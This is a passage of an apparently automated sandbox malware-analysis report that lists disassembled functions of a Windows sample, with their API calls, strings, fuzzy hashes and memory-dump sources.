    • API String ID: 385609497-2939940506
    • Opcode ID: 01beef57f8664a78ba95db4217fbb442da8ea09662e79dc69cfadf98eeecac7e
    • Instruction ID: 2761196077935e15f01c581a4370fc49247e25797d62e846fa0afe59a508ca62
    • Opcode Fuzzy Hash: 01beef57f8664a78ba95db4217fbb442da8ea09662e79dc69cfadf98eeecac7e
    • Instruction Fuzzy Hash: C02117B250018CABEB21DFA0EC85EEF3BACFF19704F040066FA05E6011E724DA49CB60
    Function 000D0EC0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,000BC43F,000BC441,00000000,00000000,D4CE042F,00000001,00000000,00000000,000BC32C,?,?,?,000BC43F,ROOT\CIMV2), ref: 000D0F49
    • MultiByteToWideChar.KERNEL32(00000000,00000000,000BC43F,?,00000000,00000000,?,?,?,?,?,000BC43F), ref: 000D0FC4
    • SysAllocString.OLEAUT32(00000000), ref: 000D0FCF
    • _com_issue_error.COMSUPP ref: 000D0FF8
    • _com_issue_error.COMSUPP ref: 000D1002
    • GetLastError.KERNEL32(80070057,D4CE042F,00000001,00000000,00000000,000BC32C,?,?,?,000BC43F,ROOT\CIMV2), ref: 000D1007
    • _com_issue_error.COMSUPP ref: 000D101A
    • GetLastError.KERNEL32(00000000,?,000BC43F,ROOT\CIMV2), ref: 000D1030
    • _com_issue_error.COMSUPP ref: 000D1043
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
    • String ID:
    • API String ID: 1353541977-0
    • Opcode ID: 694355eec166bd39628bb676df1277b34d548b4bfa260e37dcd655f4b859de9f
    • Instruction ID: 2b7e7719d24b8f8a2d293481fc0cc03d16e7f33ba59d4f92ca4a297b04a3fece
    • Opcode Fuzzy Hash: 694355eec166bd39628bb676df1277b34d548b4bfa260e37dcd655f4b859de9f
    • Instruction Fuzzy Hash: B141E771A00345ABD7109F68DC45BEEBBA9EF48710F20426BF509E7381DB7599408BB5
    Function 000CE8CF Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 000CE8EE
    • ShowWindow.USER32(?,00000000), ref: 000CEA5D
    • GetExitCodeProcess.KERNEL32(?,?), ref: 000CEA99
    • CloseHandle.KERNEL32(?), ref: 000CEABF
    • ShowWindow.USER32(?,00000001), ref: 000CEB21
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
    • String ID: .exe$.inf
    • API String ID: 783751319-3750412487
    • Opcode ID: fc7d27aceffcbf349a6e0ad2e4eff3e65c863da54c430f36654b99415e727376
    • Instruction ID: e610c5b062e1a4d2b462b4596559076bef463b796179262cbcb37c0d74798815
    • Opcode Fuzzy Hash: fc7d27aceffcbf349a6e0ad2e4eff3e65c863da54c430f36654b99415e727376
    • Instruction Fuzzy Hash: 6E51BC311083C0AEEB719B60D844FBFBBE5EF84744F08881EF5C597191EB7199848B92
    Function 000BA5E9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000BA5EE
    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000BA611
    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000BA630
      • Part of subcall function 000BD6A7: _wcslen.LIBCMT ref: 000BD6AF
      • Part of subcall function 000C3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,000BD523,00000000,.exe,?,?,00000800,?,?,?,000C9E4C), ref: 000C331C
    • _swprintf.LIBCMT ref: 000BA6CC
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • MoveFileW.KERNEL32(?,?), ref: 000BA73B
    • MoveFileW.KERNEL32(?,?), ref: 000BA77B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
    • String ID: rtmp%d
    • API String ID: 3726343395-3303766350
    • Opcode ID: ce6513ceb75d26d0714434ac2392b044b23284a097a0cb98d376fcec9e4fc81d
    • Instruction ID: ec806c2323a60b39a1c6abf1af5234ccb0ce1331e45cd771d5bb857ddcb626a7
    • Opcode Fuzzy Hash: ce6513ceb75d26d0714434ac2392b044b23284a097a0cb98d376fcec9e4fc81d
    • Instruction Fuzzy Hash: C3413D71A545696ACB20ABA0CC85EEF77BCFF56340F0404AAB545E3046EF748A85CF61
    Function 000C2528 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
    Download Yara Rule
    APIs
    • __aulldiv.LIBCMT ref: 000C253E
      • Part of subcall function 000BC619: GetVersionExW.KERNEL32(?), ref: 000BC63E
    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 000C2561
    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 000C2573
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000C2584
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C2594
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C25A4
    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000C25DF
    • __aullrem.LIBCMT ref: 000C2689
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
    • String ID:
    • API String ID: 1247370737-0
    • Opcode ID: fc0dd195213154c672eba198532d7283972872e7436b3560ebb47ffc4fa3920e
    • Instruction ID: d93ec87814b1afe725a4b4eb2332aaee93e700952623f51cf719d5e639e962b9
    • Opcode Fuzzy Hash: fc0dd195213154c672eba198532d7283972872e7436b3560ebb47ffc4fa3920e
    • Instruction Fuzzy Hash: 1E4137B1508345AFD710DF65C884A6FBBE9FB88714F00892EF596D2610E738E549CB62
    Function 000CAD0E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: </p>$</style>$<br>$<style>$>
    • API String ID: 176396367-3568243669
    • Opcode ID: c902a21e84e434786f7612df4e258221ff71020d6639374a807df9febe438817
    • Instruction ID: 40ef1ad7823ac90f7690ccdc9bd8e3fbd9b855d84aec8b175c80a371fee1973b
    • Opcode Fuzzy Hash: c902a21e84e434786f7612df4e258221ff71020d6639374a807df9febe438817
    • Instruction Fuzzy Hash: 3251462674036B95DB705B285811FBF63E0DF6235AF64442EF9C38B6C1FA658D8182A2
    Function 000E083D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
    Download Yara Rule
    APIs
    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,000E0FB2,00000000,00000000,00000000,00000000,00000000,000D659D), ref: 000E087F
    • __fassign.LIBCMT ref: 000E08FA
    • __fassign.LIBCMT ref: 000E0915
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 000E093B
    • WriteFile.KERNEL32(?,00000000,00000000,000E0FB2,00000000,?,?,?,?,?,?,?,?,?,000E0FB2,00000000), ref: 000E095A
    • WriteFile.KERNEL32(?,00000000,00000001,000E0FB2,00000000,?,?,?,?,?,?,?,?,?,000E0FB2,00000000), ref: 000E0993
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID:
    • API String ID: 1324828854-0
    • Opcode ID: 2e14b83c446d1dd12d2c6207ffd1bbfa5b2587a4ae5ce477bb516e701abbe424
    • Instruction ID: a23b3b3ecf01668a4616ceb428e056b29058dcb91e142cc8b47946610a46021e
    • Opcode Fuzzy Hash: 2e14b83c446d1dd12d2c6207ffd1bbfa5b2587a4ae5ce477bb516e701abbe424
    • Instruction Fuzzy Hash: 7551B3B1A002899FDB10CFA9DC85BEEBBF8EF09310F14415AE595F7252E7749980CB60
    Function 000D3A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
    Download Yara Rule
    APIs
    • _ValidateLocalCookies.LIBCMT ref: 000D3AB7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 000D3ABF
    • _ValidateLocalCookies.LIBCMT ref: 000D3B48
    • __IsNonwritableInCurrentImage.LIBCMT ref: 000D3B73
    • _ValidateLocalCookies.LIBCMT ref: 000D3BC8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: 5eeee65ebbaca63fe507331a3da9b33ce63024a275acfea12236a19c5f78bde0
    • Instruction ID: 6585911822f965a2be77a97c121f7da6d0934265edc020c41d733abc8a2faca6
    • Opcode Fuzzy Hash: 5eeee65ebbaca63fe507331a3da9b33ce63024a275acfea12236a19c5f78bde0
    • Instruction Fuzzy Hash: A941A334A003189FCF50DF69C885A9EBBF5AF44324F148167EA186B353D735AA15CFA2
    Function 000CA965 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
    • API String ID: 176396367-3743748572
    • Opcode ID: f6109bd105f28865ecb8f6563ec5d55a1fd30dd8b2dc5df478c1521ca180f96b
    • Instruction ID: d65f9e943c99af93c695e9cd59ee51a78ee4a13ca996ec1534191c716cc6953f
    • Opcode Fuzzy Hash: f6109bd105f28865ecb8f6563ec5d55a1fd30dd8b2dc5df478c1521ca180f96b
    • Instruction Fuzzy Hash: D3312C22744749AAD634AB54AC42FBE73E4EB51328F60842FF59557291FBB0AC44C3B3
    Function 000DDA54 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 000DDA18: _free.LIBCMT ref: 000DDA41
    • _free.LIBCMT ref: 000DDAA2
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000DDAAD
    • _free.LIBCMT ref: 000DDAB8
    • _free.LIBCMT ref: 000DDB0C
    • _free.LIBCMT ref: 000DDB17
    • _free.LIBCMT ref: 000DDB22
    • _free.LIBCMT ref: 000DDB2D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction ID: 920d73d21fce31cd11168c1be65cb8cfcb23eb9ff108a51ed959938c35b10519
    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction Fuzzy Hash: BB111F71A44B04FAD620BBB4CC0BFCB779C6F15700F448C17B29A7A293DA65B50547B2
    Function 000CF76A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,000CF7E5,000CF748,000CF9E9), ref: 000CF781
    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000CF797
    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000CF7AC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
    • API String ID: 667068680-1718035505
    • Opcode ID: 07262f634c715ed95769f1c6d5a7932f64e4b624ecf205459cc72cfb4d9c6ed0
    • Instruction ID: ba701e9b8f75bb064dbca4d362c05809fcfebea073f3444b166582e1c64eb96f
    • Opcode Fuzzy Hash: 07262f634c715ed95769f1c6d5a7932f64e4b624ecf205459cc72cfb4d9c6ed0
    • Instruction Fuzzy Hash: C9F022323092635B9F704FA46EC4FBE22CA8F057A0360063DDA20F7A44E320CC8046D2
    Function 000C2789 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
    Download Yara Rule
    APIs
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C27E1
      • Part of subcall function 000BC619: GetVersionExW.KERNEL32(?), ref: 000BC63E
    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000C2805
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 000C281F
    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 000C2832
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C2842
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C2852
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion
    • String ID:
    • API String ID: 2092733347-0
    • Opcode ID: e7c5aa19629f8a0d8c40e45ceb24aa94edb8e7eb6f2588cead5fa59a964f970d
    • Instruction ID: a74624e59975a2a8cd7bf699d028cf7aa64aa31f36417368c4e7efc5a71780bf
    • Opcode Fuzzy Hash: e7c5aa19629f8a0d8c40e45ceb24aa94edb8e7eb6f2588cead5fa59a964f970d
    • Instruction Fuzzy Hash: 76311775108346ABC704DFA8D88499BB7E8BF98B04F005A2EF999D3210E734D549CBA6
    Function 000D3C7A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,000D3C71,000D3A2C,000D0BE4), ref: 000D3C88
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000D3C96
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000D3CAF
    • SetLastError.KERNEL32(00000000,000D3C71,000D3A2C,000D0BE4), ref: 000D3D01
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: d07c0e7bd67a8578291de6f327d8199fa3a8f00cdf13a3897fa7b51ca5d019fb
    • Instruction ID: f2f9bc3a542acc97b786cb3958faf33404fd81697a37c76152d58a4b685c3a62
    • Opcode Fuzzy Hash: d07c0e7bd67a8578291de6f327d8199fa3a8f00cdf13a3897fa7b51ca5d019fb
    • Instruction Fuzzy Hash: C101283261E3113EF66427787C8676B2B85EF41771F30132BF520B57E2EE252D00A6A2
    Function 000DA505 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,000F30C4,000D5972,000F30C4,?,?,000D53ED,?,?,000F30C4), ref: 000DA509
    • _free.LIBCMT ref: 000DA53C
    • _free.LIBCMT ref: 000DA564
    • SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA571
    • SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA57D
    • _abort.LIBCMT ref: 000DA583
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: 9193e658fe65b81403c36447ad4acb3f28aac5d06b532de3ceea154750b455ca
    • Instruction ID: 95715da39e0bcec2341e574fc24f34cf2e6a9a7b23d1a1f5179efa73e2c74977
    • Opcode Fuzzy Hash: 9193e658fe65b81403c36447ad4acb3f28aac5d06b532de3ceea154750b455ca
    • Instruction Fuzzy Hash: 60F0F431B44B02A7E21133357C0AFAF199A9BC3B21B250427F614A2397EF358E41D476
    Function 000CED7B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
    Download Yara Rule
    APIs
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000CED87
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CEDA1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000CEDB2
    • TranslateMessage.USER32(?), ref: 000CEDBC
    • DispatchMessageW.USER32(?), ref: 000CEDC6
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000CEDD1
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
